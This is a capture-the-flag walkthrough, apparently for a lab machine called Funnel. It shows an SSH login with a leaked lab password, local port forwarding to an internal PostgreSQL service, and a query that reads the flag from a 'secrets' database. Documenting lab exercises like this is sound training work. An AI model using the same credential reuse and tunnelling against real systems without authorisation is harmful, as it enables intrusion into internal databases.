LOCAL PORT FORWARDING
#
root@oco:~$ ssh christine@10.129.22.40 -L 31173:127.0.0.1:5432
christine@10.129.22.40's password: funnel123#!#
* the ssh client (attackerMachine) will establish a secure connection
to the remote SSH server (targetMachine). the ssh client (attackerMachine)
will listen for incoming connections on the local port (attackerMachine)
on port 31173.
- when a client connects to the local port, the ssh client (attackingMachine)
will forward the connection to the remote server (targetMachine) on port
5432. this allows the local client (attackingMachine) to access services
on the remote server (targetMachine) as if they were running on the
local machine.
christine@funnel:~$ ss -tlpna
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:38617 0.0.0.0:*
ESTAB 0 0 10.129.22.40:22 10.10.14.215:46754
SYN-SENT 0 1 10.129.22.40:42680 8.8.8.8:53
LISTEN 0 32 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*#
root@oco:~$ psql -U christine -h localhost -p 31173
Password for user christine:
psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
Type "help" for help.
christine=#
* ensure to specify localhost using the -h option to target the tunnel
created earlier with SSH, as well as port 31173 with the -p option,
which is the port the tunnel is listening on.
christine=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
christine | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
postgres | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
secrets | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
template0 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
template1 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
(5 rows)
* this list the existing DB
christine=# \connect secrets
psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
You are now connected to database "secrets" as user "christine".
* this connects to the specified DB
secrets=# \dt
List of relations
Schema | Name | Type | Owner
--------+------+-------+-----------
public | flag | table | christine
(1 row)
* list the database's tables
secrets=# select * from flag;
value
----------------------------------
cf277664b1771217d7006acdea006db1
(1 row)Last updated